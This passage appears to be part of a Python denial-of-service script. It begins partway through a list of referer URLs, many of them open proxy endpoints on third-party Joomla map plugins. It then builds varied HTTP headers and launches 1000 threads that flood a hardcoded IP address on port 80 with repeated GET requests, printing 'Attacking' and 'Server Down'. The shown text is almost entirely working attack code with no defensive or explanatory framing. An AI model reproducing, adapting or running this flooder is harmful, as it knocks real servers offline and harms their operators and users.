'http://policlinicamonteabraao.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.vetreriafasanese.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.benawifi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.valleyview.sa.edu.au/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.racersedgekarting.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=?url=',
'http://www.villamagnoliarelais.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://worldwide-trips.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.veloclub.ru/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.virtualsoft.pl/plugins/content/plugin_googlemap3_proxy.php?url=',
'http://gminazdzieszowice.pl/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url=',
'http://www.fare-furore.com/com-line/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.rotisseriesalaberry.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.seebybike.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri=',
'http://validator.w3.org/nu/?doc=',
'http://check-host.net/check-http?host=',
'http://www.netvibes.com/subscribe.php?url=',
'http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.sistem5.net/ww/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.fmradiom.hu/palosvorosmart/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.iguassusoft.com/site/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://lab.univ-batna.dz/lea/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.computerpoint3.it/cp3/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://hotel-veles.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://klaassienatuinstra.nl/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.google.com/ig/add?feedurl=',
'http://anonymouse.org/cgi-bin/anon-www.cgi/',
'http://www.google.com/translate?u=',
'http://translate.google.com/translate?u=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs=',
'http://validator.w3.org/check?uri=',
'http://jigsaw.w3.org/css-validator/validator?uri=',
'http://validator.w3.org/checklink?uri=',
'http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri=',
'http://www.w3.org/RDF/Validator/ARPServlet?URI=',
'http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile=',
'http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile=',
'http://www.w3.org/services/tidy?docAddr=',
'http://validator.w3.org/mobile/check?docAddr=',
'http://validator.w3.org/p3p/20020128/p3p.pl?uri=',
'http://validator.w3.org/p3p/20020128/policy.pl?uri=',
'http://online.htmlvalidator.com/php/onlinevallite.php?url=',
'http://feedvalidator.org/check.cgi?url=',
'http://gmodules.com/ig/creator?url=',
]
acceptall=["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n"
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept-Language: en-US,en;q=0.5\r\n"]

ip = str('164.132.231.118')
port = int('80')
pack = int('10000')
thread = int('1000')
print("Loading...")
def start():
    global useragents, ref, acceptall
    hh = random._urandom(3016)
    xx = int(0)
    useragen = "User-Agent: "+random.choice(useragents)+"\r\n"
    accept = random.choice(acceptall)
    reffer = "Referer: "+random.choice(ref)+str(ip) + "\r\n"
    content    = "Content-Type: application/x-www-form-urlencoded\r\n"
    length     = "Content-Length: 0 \r\nConnection: Keep-Alive\r\n"
    target_host = "GET / HTTP/1.1\r\nHost: {0}:{1}\r\n".format(str(ip), int(port))
    main_req  = target_host + useragen + accept + reffer + content + length + "\r\n"
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((str(ip),int(port)))
            s.send(str.encode(main_req))
            for i in range(pack):
                s.send(str.encode(main_req))
            xx += random.randint(0, int(pack))
            print("- Attacking {0}:{1} | Sent: {2}".format(str(ip), int(port), xx))
        except:
            s.close()
            print('- Server Down')

for x in range(thread):
    thred = threading.Thread(target=start)
    thred.start()

